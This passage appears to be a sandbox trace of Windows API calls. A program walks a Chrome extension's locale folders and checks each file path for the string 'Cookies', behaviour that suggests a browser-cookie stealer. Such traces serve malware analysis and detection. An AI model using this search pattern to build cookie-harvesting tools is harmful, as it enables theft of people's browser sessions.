HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json" [0163.380] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.380] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.380] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.381] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="th", cAlternateFileName="")) returned 1 [0163.381] lstrcmpiW (lpString1="th", lpString2=".") returned 1 [0163.381] lstrcmpiW (lpString1="th", lpString2="..") returned 1 [0163.381] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.381] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.381] lstrlenW (lpString="\\") returned 1 [0163.381] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.381] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.381] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.381] lstrlenW (lpString="th") returned 2 [0163.381] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.381] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0163.381] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0163.381] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*.*" [0163.381] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.381] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.381] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01370, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b01370, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.381] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.381] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.381] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned 137 [0163.382] lstrlenW (lpString="\\") returned 1 [0163.382] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th" [0163.382] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\" [0163.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\") returned 138 [0163.382] lstrlenW (lpString="messages.json") returned 13 [0163.382] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\th\\messages.json", lpSrch="Cookies") returned 0x0 [0163.382] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b01b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x104, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.382] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.382] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="tr", cAlternateFileName="")) returned 1 [0163.382] lstrcmpiW (lpString1="tr", lpString2=".") returned 1 [0163.382] lstrcmpiW (lpString1="tr", lpString2="..") returned 1 [0163.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.382] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.382] lstrlenW (lpString="\\") returned 1 [0163.383] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.383] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b01370, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.383] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.383] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.383] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.383] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr") returned 137 [0163.383] lstrlenW (lpString="\\") returned 1 [0163.383] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\tr\\messages.json", lpSrch="Cookies") returned 0x0 [0163.383] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.383] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.383] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="uk", cAlternateFileName="")) returned 1 [0163.383] lstrcmpiW (lpString1="uk", lpString2=".") returned 1 [0163.383] lstrcmpiW (lpString1="uk", lpString2="..") returned 1 [0163.383] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.383] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.383] lstrlenW (lpString="\\") returned 1 [0163.383] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.383] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.384] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.384] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.384] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10e, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.384] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk") returned 137 [0163.384] lstrlenW (lpString="\\") returned 1 [0163.384] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\uk\\messages.json", lpSrch="Cookies") returned 0x0 [0163.384] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10e, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.384] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.384] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="vi", cAlternateFileName="")) returned 1 [0163.384] lstrcmpiW (lpString1="vi", lpString2=".") returned 1 [0163.384] lstrcmpiW (lpString1="vi", lpString2="..") returned 1 [0163.384] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.384] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.384] lstrlenW (lpString="\\") returned 1 [0163.384] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.384] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.384] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.384] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.384] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.384] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi") returned 137 [0163.385] lstrlenW (lpString="\\") returned 1 [0163.385] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\vi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.385] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.385] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.385] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0163.385] lstrcmpiW (lpString1="zh_CN", lpString2=".") returned 1 [0163.385] lstrcmpiW (lpString1="zh_CN", lpString2="..") returned 1 [0163.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.385] lstrlenW (lpString="\\") returned 1 [0163.385] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.385] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b274d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b274d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.385] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.385] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.385] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.385] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN") returned 140 [0163.385] lstrlenW (lpString="\\") returned 1 [0163.385] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_CN\\messages.json", lpSrch="Cookies") returned 0x0 [0163.385] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b274d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b28c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.386] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.386] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0163.386] lstrcmpiW (lpString1="zh_TW", lpString2=".") returned 1 [0163.386] lstrcmpiW (lpString1="zh_TW", lpString2="..") returned 1 [0163.386] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.386] lstrlenW 